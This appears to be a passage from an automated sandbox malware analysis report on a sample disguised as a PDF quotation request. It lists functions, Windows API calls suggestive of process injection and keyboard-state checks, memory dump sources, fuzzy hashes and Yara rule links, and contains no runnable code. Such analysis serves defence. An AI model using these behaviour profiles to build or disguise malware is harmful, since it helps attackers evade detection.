                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction ID: fdd5aa0e610dc2cd72dde5d382712253eb9983a44f415c151d58865f62e4ca31
                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction Fuzzy Hash: 4012EC24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5ED1CF5A
                                                                    Function 0046F993 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0046FAF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 1183979061-0
                                                                    • Opcode ID: a70ece6c2f64391aba36cace3f64c0e351dd3eff5a0fa39c8564997533122c8d
                                                                    • Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
                                                                    • Opcode Fuzzy Hash: a70ece6c2f64391aba36cace3f64c0e351dd3eff5a0fa39c8564997533122c8d
                                                                    • Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A
                                                                    Function 0046C43E Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 8df657b0635ddf40311d8f99a62f57a258a1744c88a1c496cf738bcc6a35415e
                                                                    • Instruction ID: 6b219bc4c0bbc29583a32018d9336d0aaf9d3e1b43f092b4040c7a5c6c0e764f
                                                                    • Opcode Fuzzy Hash: 8df657b0635ddf40311d8f99a62f57a258a1744c88a1c496cf738bcc6a35415e
                                                                    • Instruction Fuzzy Hash: 18415EB4500612EBC710EF56C4C156AFBB0FF48308F2088AFE5D617355DBB9A950DB86
                                                                    Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 1df35ced6376be517e7c74ad99ccbd00765a5d0df5d1e0e90f92159815d7b44c
                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                    • Opcode Fuzzy Hash: 1df35ced6376be517e7c74ad99ccbd00765a5d0df5d1e0e90f92159815d7b44c
                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                    Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                    Function 0040DF90 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                    • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                                                    • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                    • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                                                    Function 0044C0A3 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: efc549f785c575d7fc561f162d3cdf3fadd14233f012674f3910e14d59da33a7
                                                                    • Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
                                                                    • Opcode Fuzzy Hash: efc549f785c575d7fc561f162d3cdf3fadd14233f012674f3910e14d59da33a7
                                                                    • Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99
                                                                    Function 00403910 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                    • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                                                    • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                    • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                                                    Function 0044C1B5 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0044C1F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 1183979061-0
                                                                    • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                    • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                                                    • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                    • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                                                    Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file
                                                                    • String ID:
                                                                    • API String ID: 3031932315-0
                                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                    Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 004142F5
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                    • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                    • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                    • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                    Function 00432017 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                    • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                    • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                    • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                                    Function 0040E050 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                    • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                                                    • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                    • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                                                    Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                    Function 032622E4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 59079138a9fc49ed338b244be567448184de40e65e029ed02931d4be614867f2
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: F1E0BF7594020DEFDB00DFA8D54D6DD7BB4EF04301F1005A1FD05D7680DB309E648A62
                                                                    Function 032622E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 6a8d22d48e3ee7998b2016c5237d1dff28f35552d49f217676f62f7a44c92d7d
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 81E0E67594020DDFDB00DFB8D54D69D7BB4EF04301F1005A1FD01D2280D7309D608A72

                                                                    Non-executed Functions

                                                                    Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00A43660,00000000,00000000,00000000), ref: 0047CB9B
                                                                    • ImageList_BeginDrag.COMCTL32(00A43660,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                    • SendMessageW.USER32 ref: 0047CD12
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                    • SendMessageW.USER32 ref: 0047CD80
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
